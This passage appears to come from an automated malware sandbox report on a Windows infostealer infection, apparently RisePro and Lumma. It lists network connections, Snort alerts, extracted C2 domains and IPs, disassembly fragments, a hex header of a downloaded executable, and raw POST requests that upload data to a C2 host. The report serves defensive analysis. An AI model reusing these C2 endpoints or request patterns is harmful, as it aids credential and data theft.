Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49778 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49787 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49790 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49792 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49793 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49794 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49796 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49798 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49802 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49808 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49809 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49813 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49814 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49815 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49816 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49817 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49819 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49820 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49821 version: TLS 1.2

Source:	Binary string: NETCrypt.pdb source: OJa1BOigU3.exe, 00000000.00000003.2278188796.00000000068DA000.00000004.00000020.00020000.00000000.sdmp, U8cABsPhZFkKRrQ4rE0N.exe, 0000000F.00000000.2287643902.0000000000BB2000.00000002.00000001.01000000.00000008.sdmp, U8cABsPhZFkKRrQ4rE0N.exe.0.dr, lumma2804[1].exe.0.dr, MSIUpdaterV1.exe0.0.dr
Source:	Binary string: RegAsm.pdb source: RegAsm.exe, 00000019.00000002.3510229323.0000000000ED6000.00000004.00000020.00020000.00000000.sdmp, MPGPH1.exe, 00000024.00000000.2415322338.0000000000482000.00000002.00000001.01000000.0000000F.sdmp, RegAsm.exe, 0000002A.00000002.3509011004.0000000001236000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002C.00000002.3509342638.0000000001554000.00000004.00000020.00020000.00000000.sdmp, MPGPH1.exe.25.dr, RageMP1.exe.25.dr
Source:	Binary string: d:\DMG_1102CTP\src\ndp\fx\src\DataWeb\Server\objr\i386\Microsoft.Data.Services.pdb source: Microsoft.Data.Services.dll
Source:	Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000019.00000002.3510229323.0000000000ED6000.00000004.00000020.00020000.00000000.sdmp, MPGPH1.exe, 00000024.00000000.2415322338.0000000000482000.00000002.00000001.01000000.0000000F.sdmp, RegAsm.exe, 0000002A.00000002.3509011004.0000000001236000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002C.00000002.3509342638.0000000001554000.00000004.00000020.00020000.00000000.sdmp, MPGPH1.exe.25.dr, RageMP1.exe.25.dr

Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_003AE66D FindFirstFileExW,FindNextFileW,FindClose,FindClose,		22_2_003AE66D
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_0012E66D FindFirstFileExW,FindNextFileW,FindClose,FindClose,		23_2_0012E66D

Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_MSIUpdaterV1.exe_f9eb3d1e2eda166485f639133f6bde09db46edb_bdfd7a68_899606cd-84e4-4b77-a8a7-4c234ca106ec\
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_v6ggwc2fJXXgIu5f_1887f2cf649886fae0c2ea234d3f8ef03762663d_678a9ce0_5061925a-09f5-43b8-b876-e8a14283e34c\

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+08h]	17_2_0043E6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ecx], al	17_2_00427878
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [eax], cl	17_2_00427878
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov esi, dword ptr [esp+70h]	17_2_00416975
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, dword ptr [esi+0Ch]	17_2_00421ADB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+04h]	17_2_0043EC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then inc ebx	17_2_00414D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [eax], cl	17_2_00426F56
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [eax], cl	17_2_00426F56
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [eax], cl	17_2_00426F56
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [eax], cl	17_2_00426F56
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], cl	17_2_0042617B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h	17_2_0041817E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, eax	17_2_00423269
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [00445A9Ch]	17_2_00417213
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	17_2_004032C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+0Ch]	17_2_0043F2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then dec edi	17_2_0043F2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then add ebx, 02h	17_2_004112AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then inc esi	17_2_004112AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	17_2_004222B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [esp+0Ch]	17_2_0043B383
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+70h]	17_2_00417533
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	17_2_004025D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+08h]	17_2_0043E590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [ebx+eax-01h]	17_2_0043C622
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+5Ch]	17_2_004246F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	17_2_004376B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then lea eax, dword ptr [edi+04h]	17_2_0042475B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	17_2_004257B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	17_2_0041F870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	17_2_004378C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+08h]	17_2_0043E8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esi+10h]	17_2_004288F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ecx], dl	17_2_004288F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	17_2_004379D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+08h]	17_2_00402A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000170h]	17_2_00412B63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ecx], al	17_2_00427C5C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [eax], cl	17_2_00427C5C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, ecx	17_2_0043DC3C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, word ptr [ebp+eax*4+00h]	17_2_00407D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, dword ptr [esp]	17_2_00407D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then push edi	17_2_00413DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	17_2_00434E40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+10h]	17_2_00424E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [edx], 00000000h	17_2_00411E79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ecx], al	17_2_00416E26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+00000080h]	17_2_0041DEF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	17_2_0041DEF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+0Ch]	17_2_0043CE90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [eax], cl	17_2_00426F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [eax], cl	17_2_00426F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [eax], cl	17_2_00426F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [eax], cl	17_2_00426F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+04h]	17_2_0043EF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then xor ebx, ebx	17_2_00413F77
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movsx ecx, byte ptr [esi+eax]	17_2_0040CF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	17_2_0043AF87

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2049060 ET TROJAN RisePro TCP Heartbeat Packet 192.168.2.4:49739 -> 193.233.132.226:50500
Source: Traffic	Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 193.233.132.226:50500 -> 192.168.2.4:49739
Source: Traffic	Snort IDS: 2046269 ET TROJAN [ANY.RUN] RisePro TCP (Activity) 192.168.2.4:49739 -> 193.233.132.226:50500
Source: Traffic	Snort IDS: 2046267 ET TROJAN [ANY.RUN] RisePro TCP (External IP) 193.233.132.226:50500 -> 192.168.2.4:49739
Source: Traffic	Snort IDS: 2046268 ET TROJAN [ANY.RUN] RisePro TCP v.0.x (Get_settings) 192.168.2.4:49739 -> 193.233.132.226:50500

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: boredimperissvieos.shop
Source: Malware configuration extractor	URLs: holicisticscrarws.shop
Source: Malware configuration extractor	URLs: sweetsquarediaslw.shop
Source: Malware configuration extractor	URLs: plaintediousidowsko.shop
Source: Malware configuration extractor	URLs: miniaturefinerninewjs.shop
Source: Malware configuration extractor	URLs: miniaturefinerninewjs.shop
Source: Malware configuration extractor	URLs: zippyfinickysofwps.shop
Source: Malware configuration extractor	URLs: obsceneclassyjuwks.shop
Source: Malware configuration extractor	URLs: acceptabledcooeprs.shop
Source: Malware configuration extractor	URLs: miniaturefinerninewjs.shop

Source: global traffic

TCP traffic: 192.168.2.4:49732 -> 193.233.132.226:50500

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 06 May 2024 05:53:02 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Sun, 05 May 2024 10:02:05 GMTETag: "6aab18-617b20b900396"Accept-Ranges: bytesContent-Length: 6990616Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 ca 39 36 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 bc 15 00 00 3e 17 00 00 00 00 00 a3 8c a4 00 00 10 00 00 00 d0 15 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 b9 00 00 04 00 00 41 5d 6b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 55 4f 00 40 01 00 00 00 a0 ab 00 0e 5f 0d 00 00 00 00 00 00 00 00 00 00 4a 6a 00 18 61 00 00 00 80 ab 00 d0 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 4b a1 00 18 00 00 00 90 67 ab 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 4e 00 8c 00 00 00 e4 93 a8 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e8 ba 15 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 32 7e 02 00 00 d0 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 30 49 00 00 00 50 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 6d 70 c2 a8 c5 bd ec f3 35 00 00 a0 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 76 6d 70 c2 a8 c5 bd 2c 07 00 00 00 a0 4e 00 00 08 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 6d 70 c2 a8 c5 bd 40 c0 5c 00 00 b0 4e 00 00 c2 5c 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 d0 1a 00 00 00 80 ab 00 00 1c 00 00 00 ce 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 0e 5f 0d 00 00 a0 ab 00 00 60 0d 00 00 ea 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: Joe Sandbox View	IP Address: 5.42.66.10 5.42.66.10
Source: Joe Sandbox View	IP Address: 5.42.66.10 5.42.66.10
Source: Joe Sandbox View	IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View	IP Address: 34.117.186.192 34.117.186.192

Source: Joe Sandbox View

ASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: ipinfo.io

Source: global traffic	HTTP traffic detected: GET /widget/demo/84.17.40.101 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=84.17.40.101 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: miniaturefinerninewjs.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: miniaturefinerninewjs.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: miniaturefinerninewjs.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: miniaturefinerninewjs.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: miniaturefinerninewjs.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7079Host: miniaturefinerninewjs.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1319Host: miniaturefinerninewjs.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 585438Host: miniaturefinerninewjs.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: miniaturefinerninewjs.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: miniaturefinerninewjs.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: miniaturefinerninewjs.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: miniaturefinerninewjs.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: miniaturefinerninewjs.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: miniaturefinerninewjs.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: miniaturefinerninewjs.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: miniaturefinerninewjs.shop
